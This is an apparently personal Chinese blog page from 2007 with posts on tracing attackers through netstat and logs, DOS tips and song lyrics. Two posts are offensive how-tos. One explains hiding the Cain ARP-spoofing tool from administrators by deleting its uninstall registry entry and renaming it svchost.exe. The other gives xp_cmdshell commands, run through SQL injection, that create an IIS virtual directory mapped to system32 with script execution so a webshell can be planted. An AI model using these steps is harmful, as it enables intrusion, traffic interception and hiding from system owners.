在黑与白之间寻找平衡点

用简单方法查找黑客的足迹

Thursday, 10. May 2007, 12:12:14

PS:这是维护服务器的一些小总结,写下来给大家参考参考.部分来源于网络.首发B.S.T.转载请注名出处.
网络安全是一个综合的、复杂的工程，任何网络安全措施都不能保证万无一失。因此，一旦网络遭到攻击，如何追踪网络攻击，是十分必要的。追踪网络攻击就是找到事件发生的源头。话不多说,细心往下看咯.

　　1.netstat命令----实时察看攻击者
　　
　　使用netstat命令可以获得所有联接被测主机的网络用户的IP地址。Windows系列、Unix系列、Linux等常用网络操作系统都可以使用“netstat”命令。这里主要针对Windows系列.
　　
　　使用“netstat”命令的缺点是只能显示当前的连接，如果使用“netstat”命令时攻击者没有联接，则无法发现攻击者的踪迹。为此，可以使用 Scheduler建立一个日程安排，安排系统每隔一定的时间使用一次“netstat”命令，并使用netstattextfile格式把每次检查时得到的数据写入一个文本文件中，以便需要追踪网络攻击时使用。
　　
　　2.日志数据--最详细的攻击记录
　　
　　系统的日志数据提供了详细的用户登录信息。在追踪网络攻击时，这些数据是最直接的、有效的证据。但是有些系统的日志数据不完善，网络攻击者也常会把自己的活动从系统日志中删除。因此，需要采取补救措施，以保证日志数据的完整性。

　　WindowsNT和Windows2000/2003的日志
　　
　　WindowsNT 和Windows2000/2003有系统日志、安全日志和应用程序日志等三个日志，而与安全相关的数据包含在安全日志中。安全日志记录了登录用户的相关信息。安全日志中的数据是由配置所决定的。因此，应该根据安全需要合理进行配置，以便获得保证系统安全所必需的数据。
　　
　　但是，WindowsNT和Windows2000/2003的安全日志存在重大缺陷，它不记录事件的源，不可能根据安全日志中的数据追踪攻击者的源地址。为了解决这个问题，可以安装一个第三方的能够完整记录审计数据的工具。
　　
　　3.防火墙日志
　　
　　作为网络系统中的“堡垒主机”，防火墙被网络攻击者攻陷的可能性要小得多。然而道高一尺,魔高一丈,防火墙的攻破也时有发生,这时它的日志也可能被删除和修改。
　　攻击者还可向防火墙发动拒绝服务攻击，使防火墙瘫痪或至少降低其速度使其难以对事件做出及时响应，从而破坏防火墙日志的完整性。因此，在使用防火墙日志之前，应该运行专用工具检查防火墙日志的完整性，以防得到不完整的数据，贻误追踪时机。

1 Comment

DOS小知识

Thursday, 10. May 2007, 11:36:13

　　有些情况下，软件禁止了文件夹显示(如文件夹隐藏大师)。这样即使构选了显示全部隐藏文件，也无法看到。我们可以对隐藏得磁盘分区使用 chkdsk /v 参数来显示所有得隐藏文件得大小和路径等信息。

如果想将文件拷贝出来，除了使用copy命令外，我们还可以使用type命令。举例如下,呵呵：

C:\type av1.rmvb >D:\av2.rmvb 就可以将c盘下文件名为av1.rmvb得文件拷贝到D盘下得av2.rmvb

0 Comments

发现注册表下的一个有用的键值

Thursday, 10. May 2007, 11:29:11

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run这个键值的好处大家都知道了，不过发现以下这个键值也有很多用处HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall
平时为了进行arp欺骗，总是喜欢安装cain，但是安装后就会在桌面和开始--程序里面留下安装痕迹，但是这个好办，直接删除就得了，关键是控制面板--添加删除程序那里也有痕迹，就不知道怎么删除了。现在好了，直接在HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall这个键值下找到cain这个，删除之，这样就在添加删除程序那里也看不到cain的相关信息。这样就了无痕迹了。

安装cain的时候安装的目录深些，直接安装在system32的下一级目录里面，然后安装后把cain.exe改名为svchost.exe，这样运行后对方管理员如果只看任务管理器的话根本看不出来什么东西的。呵呵，这样就可以尽情的arp欺骗了。

0 Comments

继续发几首最近很爱听的歌~~

Tuesday, 1. May 2007, 04:51:38

陶喆-太美丽

每一滴眼泪
每一次心碎
什么爱能无疚无悔
不灰心等待
痛苦也忍耐
你坚持爱了就不后退
我知道我不是一个轻易就会说爱的人
没有想到这样的你却改变我
太美丽太美丽
你的爱是多么的甜蜜
太美丽爱让我也美丽
现在我不再怀疑不怀疑
有多爱你

每一个脚印
每一朵乌云
说着我的飘忽不定
伤你伤好深
别人早就要放弃
为何你还是会给我宽容
我知道我不是一个轻易就会说爱的人
可是你坚强的付出却改变我
太美丽太美丽
你的爱是多么的甜蜜
太美丽爱让我也美丽
现在你也不必再去怀疑
当你在风雨的未知里走过
当我在迷失的自我的漩涡
交汇在黑暗中你我发出了新的光芒
现在我已全明白
什么是爱的真义

太美丽太美丽
你的爱让生命太甜蜜
太美丽只有对你感激
越过表面我看见你
美丽的心

你最美丽
你太美丽

夜照亮了夜

夜是那么黑
看不见悲喜界限
任谁都好累
青春只剩一滴眼泪
我变成了谁
不自由为爱放逐灵魂
心死就不伤悲
明知爱很珍贵
夜照亮了夜
痛战胜了痛
然而春去春回
长大成人滋味
最黑的黑是背叛
最痛的痛是原谅
雾是那么轻
可以覆盖一切
放过手的不是昨天明天你我
风吹过了雪爱的记忆都融解
这一刻心为蝶挣脱轮回
我愿拥抱你
你不能承受的虚伪我来体会
我愿拥抱你
你给不起的未来我来告别

橘子红了

院子来了一群雀鸟做客
挂满橘子的树于是活了

刚下山的夕阳把影子拉长了
你走到了门口
手上拎着行李是要走呢
还是作过的梦都不算了
眼睁睁望着你我却不敢开口
我没勇气要求
这忧啊这愁啊这爱啊这债啊
混在我脑海已瞬间成灾
你是哭呢笑呢悲呢喜呢
你这样掩埋别教我去猜
这盼啊这等啊这去啊这来啊
这欢喜悲哀还不够精采
我是梦呢醒呢问呢闷呢
橘子红了是该摘了不能不爱了

手上拎着行李是要走呢
还是作过的梦都不算了
眼睁睁望着你我却不敢开口
我没勇气要求
这忧啊这愁啊这爱啊这债啊
混在我脑海已瞬间成灾
你是哭呢笑呢悲呢喜呢
你这样掩埋别教我去猜
这盼啊这等啊这去啊这来啊
这欢喜悲哀还不够精采
我是梦呢醒呢问呢闷呢

1 Comment

SQL注入建立虚拟目录

Tuesday, 1. May 2007, 04:41:35

同样来源：H4x0r's Blog

我们很多情况下都遇到SQL注入可以列目录和运行命令，但是却很不容易找到web所在目录，也就不好得到一个webshell，这一招不错：

exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"'
建立虚拟目录win,指向c:\winnt\system32
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture'
让win句有解析asp脚本权限

exec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/h4x0r/"
删除虚拟目录。
找不到web绝对路径的一种解决办法
403错误，表示虚拟目录建好了。。。

0 Comments

1 2 Next »

Showing posts 1 - 5 of 10.